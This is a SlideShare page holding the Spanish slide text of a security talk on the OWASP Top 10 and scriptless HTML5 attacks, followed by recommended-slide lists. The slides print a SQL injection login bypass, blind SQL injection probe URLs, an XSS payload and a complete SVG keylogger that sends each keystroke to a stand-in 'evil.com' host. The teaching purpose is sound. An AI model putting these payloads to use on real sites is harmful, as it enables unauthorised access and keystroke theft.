SlideShare uma empresa Scribd logo

OWASP Top 10 y nuevas vulnerabilidades HTML5

Nextel S.A.
Nextel S.A.

El documento presenta una introducción a viejas vulnerabilidades como las incluidas en el OWASP Top 10 de 2013 (inyecciones, autenticación rota, XSS) y nuevas vulnerabilidades relacionadas con HTML5. Luego profundiza en cada vulnerabilidad del OWASP Top 10, mostrando ejemplos prácticos de inyecciones SQL, XSS, CSRF y más. Finalmente, concluye con demostraciones de ataques emergentes que aprovechan características de HTML5 sin necesidad de scripts.

Tecnologia
1 de 42
Baixar para ler offline
PabloGaraizar, UniversidaddeDeusto XVJornadadeSeguridadTI LaWebcomoplataformadereferencia: viejosataquesy nuevasvulnerabilidades
¿De qué vamos a hablar? ● Oldies goldies: OWASP Top 10, 2013: ● A1 - Injections ● A2 - Broken Authentication and Session Management ● A3 - Cross-Site Scripting (XSS) ● … ● Nuevas vulnerabilidades en torno a HTML5.
OWASP Top 10, 2013 https://www.owasp.org/index.php/Top_10_2013-Top_10
OWASP The Open Web Application Security Project https://www.owasp.org/index.php/Main_Page
A1 - Injection SQL, OS, and LDAP injections https://www.owasp.org/index.php/Top_10_2013-A1
SQL Injection Por una comilla de nada... SELECT * FROM users WHERE user = '" + username + "' and password = '" + md5(password) + "'; Username: admin' OR '1'='1 Password: whatever SELECT * FROM users WHERE user = 'admin' OR '1'='1' and password = '" + md5('whatever') + "';
SQL Injection Si no hay mensajes de error, Blind SQL Injection ● Si no hay error, se muestra la página normal. ● http://myblog.com/post.asp?id=33 AND 1=1 SELECT * FROM posts WHERE id = 33 AND 1=1 ● Si hay error, se muestra otra página. ● http://myblog.com/post.asp?id=33 AND 1=0 SELECT * FROM posts WHERE id = 33 AND 1=0 ● Google Hacking: – inurl:"php?id=" – inurl:"asp?id="
SQL Injection Blind SQL Injection, herramientas ● SQLbfTools: – http://www.reversing.org/node/view/11 ● ./mysqlbf.exe "http://web/vulnerable.php?ID=3" "now()" "word" ● SQL Ninja: – http://sqlninja.sourceforge.net/sqlninjademo1.html ● Absinthe: – http://www.0x90.org/releases/absinthe/download.php
A2 - Broken Authentication and Session Management Compromise passwords, keys, session tokens, etc. https://www.owasp.org/index.php/Top_10_2013-A2
DEMO Login en Flash inurl:login.swf
A3 - Cross-Site Scripting (XSS) Allows attackers to execute scripts in the victim’s browser https://www.owasp.org/index.php/Top_10_2013-A3
Cross-Site Scripting (XSS) Diferentes tipos y alcances ● Tipo 0: Basado en DOM. – Una página maliciosa abre una página local con permisos de Zona Local y ejecuta código con esas credenciales. – Típicamente en phising o SPAM. ● Tipo 1: No persistente. – El más común, necesita Ingeniería Social para explotarse. – Típicamente en webs de búsquedas, se muestra a su vez la cadena consultada (si tiene código, será ejecutado). ● Tipo 2: Persistente. – El código está almacenado en una BD, fichero, o similar. – No requiere mucha Ingeniería Social para que la víctima lo ejecute. – Típicamente en foros o similares.
A4 - Insecure Direct Object References References to an internal implementation object, such as a file, directory, or database key https://www.owasp.org/index.php/Top_10_2013-A4
RFI PHP shells http://oco.cc/
A5 - Security Misconfiguration Keeping all software up to date https://www.owasp.org/index.php/Top_10_2013-A5
The Exploit Database Búsqueda de avisos + exploits ordenados por temas y fechas http://www.exploit-db.com/
A6 - Sensitive Data Exposure Sensitive data deserves extra protection such as encryption https://www.owasp.org/index.php/Top_10_2013-A6
Seguridad a través de la oscuridad robots.txt http://www.casareal.es/robots.txt User-agent: * Disallow: Disallow: /_*/ Disallow: /ES/FamiliaReal/Urdangarin/ Disallow: /CA/FamiliaReal/Urdangarin/ Disallow: /EU/FamiliaReal/Urdangarin/ Disallow: /GL/FamiliaReal/Urdangarin/ Disallow: /VA/FamiliaReal/Urdangarin/ Disallow: /EN/FamiliaReal/Urdangarin/ Sitemap: http://www.casareal.es/sitemap.xml
Seguridad a través de la oscuridad Meta-datos: Fear the FOCA! http://www.informatica64.com/foca.aspx
A7 - Missing Function Level Access Control Attackers are able to forge requests in order to access unauthorized functionality https://www.owasp.org/index.php/Top_10_2013-A7
Proteger el cron en Moodle Similar para v1.9, 2.x, etc. http://docs.moodle.org/19/en/Cron
A8 - Cross-Site Request Forgery (CSRF) Forces a logged-on victim’s browser to send a forged HTTP request https://www.owasp.org/index.php/Top_10_2013-A8
Cross-Site Request Forgery (CSRF) XSRF o "sea-surf" ● Explota la confianza que tiene un sitio en el navegador de un cliente autenticado. – El servidor: acepta las credenciales de la sesión de usuario almacenada en el navegador. – El cliente: accede a una web que fuerza a su navegador a realizar acciones no deseadas en un sitio en el que previamente se ha autenticado. ● Contramedida: tokens específicos en cada formulario.
A9 - Using Components with Known Vulnerabilities Vulnerable components, such as libraries, frameworks, and other software modules https://www.owasp.org/index.php/Top_10_2013-A9
The Exploit Database Búsqueda de avisos + exploits ordenados por temas y fechas http://www.exploit-db.com/
A10 - Unvalidated Redirects and Forwards Attackers can redirect victims to phishing or malware sites https://www.owasp.org/index.php/Top_10_2013-A10
Ataques de redirección PoCs: IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd http://soroush.secproject.com/blog/2013/03/iefirefox-redirection-issue-fb-oauth2-bypass-bugcrowd/
Nuevas vulnerabilidades en torno a HTML5
HTML5 Client-side Stored XSS in Web SQL Database <img onerror="alert('Client-side Stored XSS')" src="nil"> http://www.andlabs.org/html5/csXSS2.html
HTML5 Cross Origin Requests wget --header="Origin: http://www.andlabs.org" www.andlabs.net/html5/acCOR.php http://www.andlabs.org/html5/acCOR.php
HTML5: muchos más ataques Web Sockets, Web Workers, UI dressing, HTML5 tag abuse, etc. http://html5security.org/
http://www.slideshare.net/x00mario/stealing-the-pie
Ataques sin scripts falso captcha usando tipografía propia http://heideri.ch/opera/captcha/
Ataques sin scripts Fuerza bruta contra password usando CSS y Regexps http://html5sec.org/invalid?start=0
Ataques sin scripts Lector de valores del DOM a través de CSS y Regexps (CSRF) http://eaea.sirdarckcat.net/cssar/v2/
Ataques sin scripts Capturador de sesión mediante CSS y Regexps http://
Ataques sin scripts Keylogger SVG http://html5sec.org/keylogger <!--injection--> <svg height="0px"> <image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none"> <set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//evil.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//evil.com/?d" /> <set attributeName="xlink:href" begin="accessKey(e)" to="//evil.com/?e" /> <set attributeName="xlink:href" begin="accessKey(f)" to="//evil.com/?f" /> <set attributeName="xlink:href" begin="accessKey(g)" to="//evil.com/?g" /> <set attributeName="xlink:href" begin="accessKey(h)" to="//evil.com/?h" /> <set attributeName="xlink:href" begin="accessKey(i)" to="//evil.com/?i" /> <set attributeName="xlink:href" begin="accessKey(j)" to="//evil.com/?j" /> <set attributeName="xlink:href" begin="accessKey(k)" to="//evil.com/?k" /> <set attributeName="xlink:href" begin="accessKey(l)" to="//evil.com/?l" /> <set attributeName="xlink:href" begin="accessKey(m)" to="//evil.com/?m" /> <set attributeName="xlink:href" begin="accessKey(n)" to="//evil.com/?n" /> <set attributeName="xlink:href" begin="accessKey(o)" to="//evil.com/?o" /> <set attributeName="xlink:href" begin="accessKey(p)" to="//evil.com/?p" /> <set attributeName="xlink:href" begin="accessKey(q)" to="//evil.com/?q" /> <set attributeName="xlink:href" begin="accessKey(r)" to="//evil.com/?r" /> <set attributeName="xlink:href" begin="accessKey(s)" to="//evil.com/?s" /> <set attributeName="xlink:href" begin="accessKey(t)" to="//evil.com/?t" /> <set attributeName="xlink:href" begin="accessKey(u)" to="//evil.com/?u" /> <set attributeName="xlink:href" begin="accessKey(v)" to="//evil.com/?v" /> <set attributeName="xlink:href" begin="accessKey(w)" to="//evil.com/?w" /> <set attributeName="xlink:href" begin="accessKey(x)" to="//evil.com/?x" /> <set attributeName="xlink:href" begin="accessKey(y)" to="//evil.com/?y" /> <set attributeName="xlink:href" begin="accessKey(z)" to="//evil.com/?z" /> </image> </svg>
Ataques sin scripts Fuerza bruta contra contraseñas mediante tipografía con “ligaduras” http://fontforge.org/
“All user input is evil until proven otherwise” Ken Cox
Muchas gracias ;-) and... happy hacking!
Referencias ● OWASP: The Open Web Application Security Project. ● El lado del mal, retos hacking, por Chema Alonso. ● Fear the FOCA! Informática64. ● IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd, por Soroush Dalili. ● HTML5 Top 10 Threats Stealth Attacks and Silent Exploits, Shreeraj Shah. ● HTML5 security. ● Scriptless Attacks: Stealing the pie without touching the sill, por Mario Heiderich, Felix Schuster y Marcus Niemietz. ● The Exploit Database.
Todas las imágenes son propiedad de sus respectivos dueños, el resto del contenido está licenciado bajo Creative Commons by-sa 3.0 http://www.zerodayclothing.com, OWASP.org, Microsoft, Exploit-db.com, Informatica64, http://www.flickr.com/photos/ivanlian/3331017290/sizes/l/in/photostream/ http://www.flickr.com/photos/samout3/3411358304/sizes/l/in/photostream/ http://www.flickr.com/photos/ndanger/9731511/sizes/l/in/photostream/ http://www.flickr.com/photos/marcophoto/6264497575/sizes/l/in/photostream/ etc.

Recomendados

Hacking Web: Attacks & Tips
Hacking Web: Attacks & TipsHacking Web: Attacks & Tips
Hacking Web: Attacks & TipsIván Sanz de Castro
 
Webinar Gratuito: Mapear una Aplicación Web con Zed Attack Proxy
Webinar Gratuito: Mapear una Aplicación Web con Zed Attack ProxyWebinar Gratuito: Mapear una Aplicación Web con Zed Attack Proxy
Webinar Gratuito: Mapear una Aplicación Web con Zed Attack ProxyAlonso Caballero
 
Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)YuniorGregorio2
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Alonso Caballero
 
Introducción a las vulnerabilidades web
Introducción a las vulnerabilidades webIntroducción a las vulnerabilidades web
Introducción a las vulnerabilidades webPablo Garaizar
 
Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Jose Gratereaux
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017superserch
 
Testing Android Security
Testing Android SecurityTesting Android Security
Testing Android SecurityJose Manuel Ortega Candel
 

Recomendados

Hacking Web: Attacks & Tips
Hacking Web: Attacks & TipsHacking Web: Attacks & Tips
Hacking Web: Attacks & TipsIván Sanz de Castro
 
Webinar Gratuito: Mapear una Aplicación Web con Zed Attack Proxy
Webinar Gratuito: Mapear una Aplicación Web con Zed Attack ProxyWebinar Gratuito: Mapear una Aplicación Web con Zed Attack Proxy
Webinar Gratuito: Mapear una Aplicación Web con Zed Attack ProxyAlonso Caballero
 
Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)YuniorGregorio2
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Alonso Caballero
 
Introducción a las vulnerabilidades web
Introducción a las vulnerabilidades webIntroducción a las vulnerabilidades web
Introducción a las vulnerabilidades webPablo Garaizar
 
Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Jose Gratereaux
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017superserch
 
Testing Android Security
Testing Android SecurityTesting Android Security
Testing Android SecurityJose Manuel Ortega Candel
 
Testing Android Security
Testing Android SecurityTesting Android Security
Testing Android SecurityJose Manuel Ortega Candel
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017yopablo
 
Taller Virtual de Pentesting contra Aplicaciones Web
Taller Virtual de Pentesting contra Aplicaciones WebTaller Virtual de Pentesting contra Aplicaciones Web
Taller Virtual de Pentesting contra Aplicaciones WebAlonso Caballero
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPMoises Silva
 
Seminario Seguridad con PHP
Seminario Seguridad con PHPSeminario Seguridad con PHP
Seminario Seguridad con PHPNazareno Lorenzo
 
Seguridad en el desarrollo de aplicaciones web
Seguridad en el desarrollo de aplicaciones webSeguridad en el desarrollo de aplicaciones web
Seguridad en el desarrollo de aplicaciones webJuan Eladio Sánchez Rosas
 
Hacking web con OWASP
Hacking web con OWASPHacking web con OWASP
Hacking web con OWASPzekivazquez
 
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Alonso Caballero
 
Owasp Top10 Spanish
Owasp Top10 SpanishOwasp Top10 Spanish
Owasp Top10 SpanishFabio Cerullo
 
Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"
Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"
Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"Alonso Caballero
 
Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"Alonso Caballero
 
Step by-step guide to buying your first home
Step by-step guide to buying your first homeStep by-step guide to buying your first home
Step by-step guide to buying your first homeSUSAN HARVEY
 
Vesten forstår ikke rusland
Vesten forstår ikke ruslandVesten forstår ikke rusland
Vesten forstår ikke ruslandMorten Munk
 
El Full de Ruta al CFA Municipal l'Olivera
El Full de Ruta al CFA Municipal l'OliveraEl Full de Ruta al CFA Municipal l'Olivera
El Full de Ruta al CFA Municipal l'OliveraOliverasqv
 
Taming The Km Monster 9/2012
Taming The Km Monster 9/2012Taming The Km Monster 9/2012
Taming The Km Monster 9/2012Jaye Lapachet
 
Het iPad paradigma - Joris van Lierop
Het iPad paradigma - Joris van LieropHet iPad paradigma - Joris van Lierop
Het iPad paradigma - Joris van LieropNUV-UVW
 
Segurity Empower Business
Segurity Empower BusinessSegurity Empower Business
Segurity Empower BusinessNextel S.A.
 
Web API Classification Survey
Web API Classification Survey Web API Classification Survey
Web API Classification Survey mmaleshkova
 
Nocall 2009 Friend Feed
Nocall 2009 Friend FeedNocall 2009 Friend Feed
Nocall 2009 Friend FeedJaye Lapachet
 
Nida Kaithal Presentation
Nida Kaithal PresentationNida Kaithal Presentation
Nida Kaithal PresentationDinesh Raheja
 
Presentació recursos PDI 2014
Presentació recursos PDI 2014Presentació recursos PDI 2014
Presentació recursos PDI 2014Xavier Barrera Sales
 
Resum Curs 2011 - 2012. Tercera Part
Resum Curs 2011 - 2012. Tercera PartResum Curs 2011 - 2012. Tercera Part
Resum Curs 2011 - 2012. Tercera PartOliverasqv
 

Mais conteúdo relacionado

Mais procurados

Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017yopablo
 
Taller Virtual de Pentesting contra Aplicaciones Web
Taller Virtual de Pentesting contra Aplicaciones WebTaller Virtual de Pentesting contra Aplicaciones Web
Taller Virtual de Pentesting contra Aplicaciones WebAlonso Caballero
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPMoises Silva
 
Seminario Seguridad con PHP
Seminario Seguridad con PHPSeminario Seguridad con PHP
Seminario Seguridad con PHPNazareno Lorenzo
 
Seguridad en el desarrollo de aplicaciones web
Seguridad en el desarrollo de aplicaciones webSeguridad en el desarrollo de aplicaciones web
Seguridad en el desarrollo de aplicaciones webJuan Eladio Sánchez Rosas
 
Hacking web con OWASP
Hacking web con OWASPHacking web con OWASP
Hacking web con OWASPzekivazquez
 
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Alonso Caballero
 
Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"
Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"
Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"Alonso Caballero
 
Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"Alonso Caballero
 

Mais procurados (11)

Testing Android Security
Testing Android SecurityTesting Android Security
Testing Android Security
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 
Taller Virtual de Pentesting contra Aplicaciones Web
Taller Virtual de Pentesting contra Aplicaciones WebTaller Virtual de Pentesting contra Aplicaciones Web
Taller Virtual de Pentesting contra Aplicaciones Web
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHP
 
Seminario Seguridad con PHP
Seminario Seguridad con PHPSeminario Seguridad con PHP
Seminario Seguridad con PHP
 
Seguridad en el desarrollo de aplicaciones web
Seguridad en el desarrollo de aplicaciones webSeguridad en el desarrollo de aplicaciones web
Seguridad en el desarrollo de aplicaciones web
 
Hacking web con OWASP
Hacking web con OWASPHacking web con OWASP
Hacking web con OWASP
 
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
 
Owasp Top10 Spanish
Owasp Top10 SpanishOwasp Top10 Spanish
Owasp Top10 Spanish
 
Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"
Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"
Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris"
 
Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"
 

Destaque

Step by-step guide to buying your first home
Step by-step guide to buying your first homeStep by-step guide to buying your first home
Step by-step guide to buying your first homeSUSAN HARVEY
 
Vesten forstår ikke rusland
Vesten forstår ikke ruslandVesten forstår ikke rusland
Vesten forstår ikke ruslandMorten Munk
 
El Full de Ruta al CFA Municipal l'Olivera
El Full de Ruta al CFA Municipal l'OliveraEl Full de Ruta al CFA Municipal l'Olivera
El Full de Ruta al CFA Municipal l'OliveraOliverasqv
 
Taming The Km Monster 9/2012
Taming The Km Monster 9/2012Taming The Km Monster 9/2012
Taming The Km Monster 9/2012Jaye Lapachet
 
Het iPad paradigma - Joris van Lierop
Het iPad paradigma - Joris van LieropHet iPad paradigma - Joris van Lierop
Het iPad paradigma - Joris van LieropNUV-UVW
 
Segurity Empower Business
Segurity Empower BusinessSegurity Empower Business
Segurity Empower BusinessNextel S.A.
 
Web API Classification Survey
Web API Classification Survey Web API Classification Survey
Web API Classification Survey mmaleshkova
 
Nocall 2009 Friend Feed
Nocall 2009 Friend FeedNocall 2009 Friend Feed
Nocall 2009 Friend FeedJaye Lapachet
 
Nida Kaithal Presentation
Nida Kaithal PresentationNida Kaithal Presentation
Nida Kaithal PresentationDinesh Raheja
 
Resum Curs 2011 - 2012. Tercera Part
Resum Curs 2011 - 2012. Tercera PartResum Curs 2011 - 2012. Tercera Part
Resum Curs 2011 - 2012. Tercera PartOliverasqv
 
Ukraine - et marked på grænsen til EU
Ukraine - et marked på grænsen til EUUkraine - et marked på grænsen til EU
Ukraine - et marked på grænsen til EUMorten Munk
 
Save The Date
Save The DateSave The Date
Save The DateRoyanna
 
CodeIgniter 〜 2008年大躍進のPHPフレームワーク
CodeIgniter 〜 2008年大躍進のPHPフレームワークCodeIgniter 〜 2008年大躍進のPHPフレームワーク
CodeIgniter 〜 2008年大躍進のPHPフレームワークkenjis
 

Destaque (16)

Step by-step guide to buying your first home
Step by-step guide to buying your first homeStep by-step guide to buying your first home
Step by-step guide to buying your first home
 
Vesten forstår ikke rusland
Vesten forstår ikke ruslandVesten forstår ikke rusland
Vesten forstår ikke rusland
 
El Full de Ruta al CFA Municipal l'Olivera
El Full de Ruta al CFA Municipal l'OliveraEl Full de Ruta al CFA Municipal l'Olivera
El Full de Ruta al CFA Municipal l'Olivera
 
Taming The Km Monster 9/2012
Taming The Km Monster 9/2012Taming The Km Monster 9/2012
Taming The Km Monster 9/2012
 
Het iPad paradigma - Joris van Lierop
Het iPad paradigma - Joris van LieropHet iPad paradigma - Joris van Lierop
Het iPad paradigma - Joris van Lierop
 
Segurity Empower Business
Segurity Empower BusinessSegurity Empower Business
Segurity Empower Business
 
Web API Classification Survey
Web API Classification Survey Web API Classification Survey
Web API Classification Survey
 
Nocall 2009 Friend Feed
Nocall 2009 Friend FeedNocall 2009 Friend Feed
Nocall 2009 Friend Feed
 
Nida Kaithal Presentation
Nida Kaithal PresentationNida Kaithal Presentation
Nida Kaithal Presentation
 
Presentació recursos PDI 2014
Presentació recursos PDI 2014Presentació recursos PDI 2014
Presentació recursos PDI 2014
 
Resum Curs 2011 - 2012. Tercera Part
Resum Curs 2011 - 2012. Tercera PartResum Curs 2011 - 2012. Tercera Part
Resum Curs 2011 - 2012. Tercera Part
 
Ukraine - et marked på grænsen til EU
Ukraine - et marked på grænsen til EUUkraine - et marked på grænsen til EU
Ukraine - et marked på grænsen til EU
 
NOCALL 2009 Wikis
NOCALL 2009 WikisNOCALL 2009 Wikis
NOCALL 2009 Wikis
 
Save The Date
Save The DateSave The Date
Save The Date
 
Scrum horoscope
Scrum horoscopeScrum horoscope
Scrum horoscope
 
CodeIgniter 〜 2008年大躍進のPHPフレームワーク
CodeIgniter 〜 2008年大躍進のPHPフレームワークCodeIgniter 〜 2008年大躍進のPHPフレームワーク
CodeIgniter 〜 2008年大躍進のPHPフレームワーク
 

Semelhante a OWASP Top 10 y nuevas vulnerabilidades HTML5

Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012iesgrancapitan.org
 
Desarrollo seguro en NodeJS (OWASP top ten y JWT)
Desarrollo seguro en NodeJS (OWASP top ten y JWT)Desarrollo seguro en NodeJS (OWASP top ten y JWT)
Desarrollo seguro en NodeJS (OWASP top ten y JWT)Raúl Requero García
 
Webinar Gratuito "Zed Attack Proxy"
Webinar Gratuito "Zed Attack Proxy"Webinar Gratuito "Zed Attack Proxy"
Webinar Gratuito "Zed Attack Proxy"Alonso Caballero
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
Consejos de seguridad con Alfresco
Consejos de seguridad con AlfrescoConsejos de seguridad con Alfresco
Consejos de seguridad con AlfrescoToni de la Fuente
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Seguridad
SeguridadSeguridad
SeguridadVLASLOV
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Concientización de Riesgos de Ciberseguridad En Wordpress.
Concientización de Riesgos de Ciberseguridad En Wordpress.Concientización de Riesgos de Ciberseguridad En Wordpress.
Concientización de Riesgos de Ciberseguridad En Wordpress.Marco Martínez
 
Webinar OWASP Zed Attack Proxy (ZAP)
Webinar OWASP Zed Attack Proxy (ZAP)Webinar OWASP Zed Attack Proxy (ZAP)
Webinar OWASP Zed Attack Proxy (ZAP)Alonso Caballero
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebEduardo Jalon
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolIt-servicios
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolKrls Avilez
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitationTensor
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 

Semelhante a OWASP Top 10 y nuevas vulnerabilidades HTML5 (20)

Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012
 
Desarrollo seguro en NodeJS (OWASP top ten y JWT)
Desarrollo seguro en NodeJS (OWASP top ten y JWT)Desarrollo seguro en NodeJS (OWASP top ten y JWT)
Desarrollo seguro en NodeJS (OWASP top ten y JWT)
 
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
 
Webinar Gratuito "Zed Attack Proxy"
Webinar Gratuito "Zed Attack Proxy"Webinar Gratuito "Zed Attack Proxy"
Webinar Gratuito "Zed Attack Proxy"
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
 
Consejos de seguridad con Alfresco
Consejos de seguridad con AlfrescoConsejos de seguridad con Alfresco
Consejos de seguridad con Alfresco
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Seguridad
SeguridadSeguridad
Seguridad
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0
 
Concientización de Riesgos de Ciberseguridad En Wordpress.
Concientización de Riesgos de Ciberseguridad En Wordpress.Concientización de Riesgos de Ciberseguridad En Wordpress.
Concientización de Riesgos de Ciberseguridad En Wordpress.
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Webinar OWASP Zed Attack Proxy (ZAP)
Webinar OWASP Zed Attack Proxy (ZAP)Webinar OWASP Zed Attack Proxy (ZAP)
Webinar OWASP Zed Attack Proxy (ZAP)
 
WebAttack - Presentación
WebAttack - PresentaciónWebAttack - Presentación
WebAttack - Presentación
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación Web
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitation
 
CodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguroCodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguro
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 

Mais de Nextel S.A.

Transformación de la organización TI
Transformación de la organización TITransformación de la organización TI
Transformación de la organización TINextel S.A.
 
Relación entre Tecnología y Negocio
Relación entre Tecnología y NegocioRelación entre Tecnología y Negocio
Relación entre Tecnología y NegocioNextel S.A.
 
Visión práctica sobre catálogo de servicios y gestión de costes TIC
Visión práctica sobre catálogo de servicios y gestión de costes TICVisión práctica sobre catálogo de servicios y gestión de costes TIC
Visión práctica sobre catálogo de servicios y gestión de costes TICNextel S.A.
 
Nuevo modelo de gestión avanzada
Nuevo modelo de gestión avanzadaNuevo modelo de gestión avanzada
Nuevo modelo de gestión avanzadaNextel S.A.
 
La gestión de una empresa pública TI
La gestión de una empresa pública TILa gestión de una empresa pública TI
La gestión de una empresa pública TINextel S.A.
 
Futuro y Tendencias TI - Preparación de profesionales en la Universidad
Futuro y Tendencias TI - Preparación de profesionales en la UniversidadFuturo y Tendencias TI - Preparación de profesionales en la Universidad
Futuro y Tendencias TI - Preparación de profesionales en la UniversidadNextel S.A.
 
Presentacion de Nextel S.A.
Presentacion de Nextel S.A.Presentacion de Nextel S.A.
Presentacion de Nextel S.A.Nextel S.A.
 
